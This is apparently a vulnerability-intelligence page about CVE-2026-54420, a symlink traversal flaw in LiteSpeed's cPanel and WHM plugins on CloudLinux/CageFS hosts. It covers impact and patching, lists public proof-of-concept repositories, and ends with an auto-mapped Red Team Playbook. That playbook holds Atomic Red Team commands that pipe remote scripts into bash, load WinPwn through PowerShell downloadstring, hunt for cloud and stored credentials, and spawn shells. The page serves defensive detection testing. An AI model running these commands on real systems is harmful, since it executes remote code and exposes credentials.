CVE-2026-54420
Overview
This vulnerability is a symbolic link (symlink) traversal issue in the LiteSpeed cPanel plugin and LiteSpeed WHM plugin components. The root cause lies in improper validation and handling of user-supplied symlink paths within the plugin's file management routines. Specifically, the plugin fails to correctly restrict symlink resolution for users with FTP or web shell access on shared hosting environments using CloudLinux/CageFS, enabling unauthorized access to filesystem locations outside intended boundaries.
Vulnerability Description
LiteSpeed cPanel plugin before 2.4.8 (as distributed in LiteSpeed WHM PlugIn before 5.3.2.0) mishandles symlinks provided by a user with FTP or web shell access on a shared hosting server running CloudLinux/CageFS, as exploited in the wild in May 2026.
Impact
An attacker with low-privileged FTP or web shell access can leverage this vulnerability to escape the CageFS containment, accessing arbitrary files on the server outside their permitted directory. This can lead to disclosure of sensitive data, including configuration files and credentials, and potentially facilitate further privilege escalation or lateral movement within the hosting environment. The exploitation does not require additional authentication or user interaction beyond initial access to FTP or shell services on the shared server.
Solution
LiteSpeed Technologies released patched versions addressing this vulnerability in LiteSpeed cPanel plugin 2.4.8 and LiteSpeed WHM plugin 5.3.2.0. Administrators should upgrade affected components to these versions or later. Detailed patch instructions and updates are available at the vendor advisory: https://blog.litespeedtech.com/2026/06/01/security-update-for-litespeed-cpanel-plugin-2/. No alternative workarounds are documented by the vendor.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the LiteSpeed cPanel plugin, particularly in versions prior to 2.4.8, arises from improper handling of symbolic links (symlinks) when accessed by users with FTP or web shell capabilities on shared hosting environments utilizing CloudLinux/CageFS. This flaw allows an attacker to manipulate symlinks to gain unauthorized access to sensitive files and directories that would typically be restricted. The underlying issue stems from insufficient validation of user-supplied symlink paths, which can lead to privilege escalation and unauthorized data exposure. The exploitation of this vulnerability is particularly concerning in shared hosting scenarios, where multiple users operate within the same server environment, increasing the risk of cross-user attacks.
Attack vectors for this vulnerability are primarily centered around shared hosting configurations, where multiple tenants share the same physical resources. An attacker with FTP or web shell access can create malicious symlinks pointing to sensitive files owned by other users or system files. For instance, an attacker could create a symlink that points to the configuration files of another user’s web application, potentially exposing database credentials or other sensitive information. Additionally, the exploitation could be automated through scripts, allowing attackers to systematically target multiple accounts on a shared server, thereby amplifying the impact of the attack. The exploitation was notably observed in the wild in May 2026, indicating that threat actors are actively leveraging this vulnerability for malicious purposes.
The real-world impact of this vulnerability is significant, particularly for businesses relying on shared hosting solutions. The potential for data breaches, unauthorized access to sensitive information, and subsequent reputational damage poses a considerable business risk. Organizations may face regulatory scrutiny and financial penalties if customer data is compromised. Furthermore, the exploitation of this vulnerability could lead to service disruptions, loss of customer trust, and increased operational costs associated with incident response and recovery efforts. The cascading effects of such an incident can be detrimental, especially for small to medium-sized enterprises that may lack the resources to effectively manage a security breach.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating the LiteSpeed cPanel plugin and associated components to the latest versions is crucial, as updates often include patches for known vulnerabilities. Additionally, employing strict access controls and monitoring user activities on shared hosting environments can help identify and mitigate potential exploitation attempts. Implementing file integrity monitoring solutions can also alert administrators to unauthorized changes in file structures, including the creation of suspicious symlinks. Furthermore, educating users about secure coding practices and the risks associated with symlink manipulation can help reduce the likelihood of exploitation.
In conclusion, the vulnerability in the LiteSpeed cPanel plugin represents a critical security concern for shared hosting environments. Its ability to facilitate unauthorized access through symlink manipulation underscores the importance of robust security practices and timely updates. Organizations must remain vigilant in their security posture, employing both technical and procedural safeguards to protect against such vulnerabilities. By understanding the nature of the threat and implementing effective detection and mitigation strategies, businesses can significantly reduce their risk exposure and safeguard their digital assets.
CSURFACE threat intelligence has identified a marked escalation in activity related to CVE-2026-54420, reflected by a notable increase in detections across our telemetry. This vulnerability’s inclusion in the CISA Known Exploited Vulnerabilities (KEV) catalog underscores its elevated priority and recognition at the federal level, signaling a shift toward broader awareness and potential targeting. The official CVSS score assignment at 8.5 further formalizes the high severity of this flaw, aligning risk assessments with observed exploitation trends. Although no new exploit techniques have surfaced, the uptick in detection frequency indicates that threat actors are actively leveraging this vulnerability in the wild, particularly in shared hosting environments where LiteSpeed’s cPanel plugin is deployed. The modest rise in EPSS score, while still low, suggests emerging exploitation potential that defenders should monitor closely. Collectively, these developments heighten the threat level, emphasizing the urgency for defenders to prioritize detection and response capabilities against this vulnerability to mitigate escalating risk exposure.
Update 2 — June 23, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation activity targeting CVE-2026-54420, accompanied by the emergence of multiple new proof-of-concept exploits publicly available on GitHub. This expansion in the exploit toolkit has coincided with a substantial increase in detection frequency across our sensors, indicating that threat actors are intensifying their operational use of this vulnerability. The elevated EPSS score further corroborates the growing exploitation potential, reflecting a shift from opportunistic to more systematic targeting within shared hosting environments leveraging LiteSpeed’s cPanel plugin. This evolution in the threat landscape significantly raises the risk profile, as the availability of public exploit code lowers the barrier to entry for less sophisticated adversaries, potentially broadening the attacker base. Consequently, defenders face increased pressure to enhance monitoring and response capabilities to address the heightened likelihood of compromise stemming from this vulnerability.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Litespeedtech | Litespeed Cpanel Plugin | All |
cpe:2.3:a:litespeedtech:litespeed_cpanel_plugin:*:*:*:*:*:*:*:*
|
|
|
Litespeedtech | Litespeed Whm Plugin | All |
cpe:2.3:a:litespeedtech:litespeed_whm_plugin:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (4)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
fevar54/CVE-2026-54420-LiteSpeed-Symlink-Exploit
A vulnerability in LiteSpeed cPanel Plugin before 2.4.8 and WHM Plugin before 5.3.2.0 mishandles symlinks provided by a ...
|
fevar54 | 0 | 0 | 2026-06-18 | View |
|
mahfuzreham/litespeed-cpanel-cve-2026-54420-fix
|
mahfuzreham | 0 | 0 | 2026-06-16 | View |
|
Resellnom/litespeed-cpanel-cve-2026-54420-fix
|
Resellnom | 0 | 0 | 2026-06-16 | View |
|
HORKimhab/CVE-2026-54420
CVE-2026-54420
|
HORKimhab | 0 | 0 | 2026-06-16 | View |
Threat Feed
13 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Sighting activity recorded
Active exploitation confirmed — vendor: LiteSpeed, product: cPanel Plugin
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-27 | Leveraging Race Conditions via Symbolic Links |
30%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2026-54420 |
| litespeedtech.com |
GitHub CVE
|
https://www.litespeedtech.com/products/litespeed-web-server/control-panel-support/cpanel |
| blog.litespeedtech.com |
GitHub CVE
|
https://blog.litespeedtech.com/2026/06/01/security-update-for-litespeed-cpanel-plugin-2/ |
| cisa.gov |
NVD API
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-54420 |